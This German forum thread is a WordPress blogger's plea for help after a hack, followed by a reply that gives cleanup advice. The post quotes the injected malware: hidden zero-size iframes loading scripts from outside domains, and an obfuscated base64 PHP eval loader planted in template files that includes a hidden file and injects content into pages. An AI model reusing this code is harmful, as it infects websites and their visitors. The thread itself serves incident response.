Mein Blog wurde gehackt (iFrame-Einbindung von pinoc.info)

  • Liebes Forum,

    bin verzweifelt, da ich trotz intensiver Suche im Netz keine Lösung für mein Problem gefunden habe und ich den Hack nicht eigenständig von meiner Seite nehmen kann.

    1.
    Dank eines Hacks wurde ein iFrame in meinen Blog [1] eingebunden:

    Code
    <iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

    2.
    Zusätzlich wurde folgender Code in alle Template-Files eingebunden:

    Code
    <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcva3VuZGVuL3Nhc3Nlbi5vcmcvd2Vic2VpdGVuL2Jsb2cvd3AtY29udGVudC9wbHVnaW5zL3BvZHByZXNzL29wdGlvbmFsX2ZpbGVzL3BvZHByZXNzX3RyYWMvLnN2bi90bXAvcHJvcC1iYXNlL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcva3VuZGVuL3Nhc3Nlbi5vcmcvd2Vic2VpdGVuL2Jsb2cvd3AtY29udGVudC9wbHVnaW5zL3BvZHByZXNzL29wdGlvbmFsX2ZpbGVzL3BvZHByZXNzX3RyYWMvLnN2bi90bXAvcHJvcC1iYXNlL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

    3.
    Im Verzeichnis von Podpress befanden sich etliche Seiten mit SPAM-Inhalten

    Kennt jemand diesen Hack?
    Wie kann ich den Hack entfernen?

    Freue mich auf jede Hilfe, da ich momentan mehr als ratlos bin.
    Beste Grüsse aus Berlin, Phil


    [1] Allgemein | Phil - Tales from the Geekside

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Ich bin kein Experte und kenne diesen speziellen Hack auch nicht (obwohl, iFrames einzubauen, wurde das nicht gerne über eine Sicherheitslücke in älteren WP-Versionen gemacht?!), aber so spontan würde ich folgendes vorschlagen:


    • Alle Passwörter ändern. Also Datenbank, FTP-Zugang etc. Nur zur Sicherheit. Auch die Passwörter der WordPress-Nutzer ändern.
    • Backup der Datenbank und des Webspaces ziehen. Dann Webspace komplett leerräumen.
    • WordPress in der richtigen Version neu herunterladen und auf den Webspace laden, nicht die alten möglicherweise manipulierten Files benutzen. Plugins genauso. Theme aus lokalem Backup wiederherstellen.
    • Wenn Du ein hinreichend aktuelles Backup hast würde ich auch die Datenbank dagegen austauschen. Gegebenenfalls könntest Du ja per WordPress-Export die danach erstellten Beiträge exportieren und nach dem Einspielen des Backups wieder importieren (im Backup enthaltene Beiträge einfach aus dem Export-File löschen, ggf. noch mal kurz auf Verdächtiges durchschauen vor dem Import). Diese Aktion könntest Du ggf. an einer lokalen Version erstmal machen, bis Du einen vollständigen und sauberen Datenbank-Dump hast, den Du dann auf dem Server nur noch zu importieren brauchst.
    • Falls Du nicht die neueste WP-Version nutzt auf WP 2.6.2 upgraden. Alle Plugins mal auf Updates überprüfen. Auch an Plugins denken, die nicht auf wp.org gehostet sind und für die Du deswegen keine Update-Benachrichtgung bekommst. Da hilft nur die Pluginseiten mal kurz abzusurfen.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!